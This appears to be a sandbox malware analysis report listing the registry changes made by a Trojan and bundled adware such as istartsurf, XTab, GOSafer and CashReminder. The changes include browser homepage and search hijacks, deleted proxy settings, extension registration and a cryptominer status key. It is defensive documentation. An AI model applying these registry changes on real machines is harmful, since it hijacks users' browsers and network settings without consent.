[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"ptid" = "pcm"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"
[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"UninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: aGf9F1GWmcyPdxOIFdIm7cfc)"
"QuietUninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
"DisplayVersion" = "1.0"
The process %original file name%.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "35 BC BD 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process powershell.exe:3772 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "8A 92 33 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process XTab_Setup2253.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"
[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1D EF BE 63 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisid.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\InternetTurbo]
"UID" = "915A4028688142931B5DDA64A4540CAD"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"QuietUninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(xBLWr3p4Aq2S5TKPAPwXoUXvWB)"
[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
"UninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"DisplayName" = "GOSafer"
The process nfregdrv.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process nfregdrv.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0A 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process CashReminder.exe:1108 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "15"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\CashReminder]
"instid" = "Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
"affid" = ""
[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Publisher" = "Related Deals LLC"
"UninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
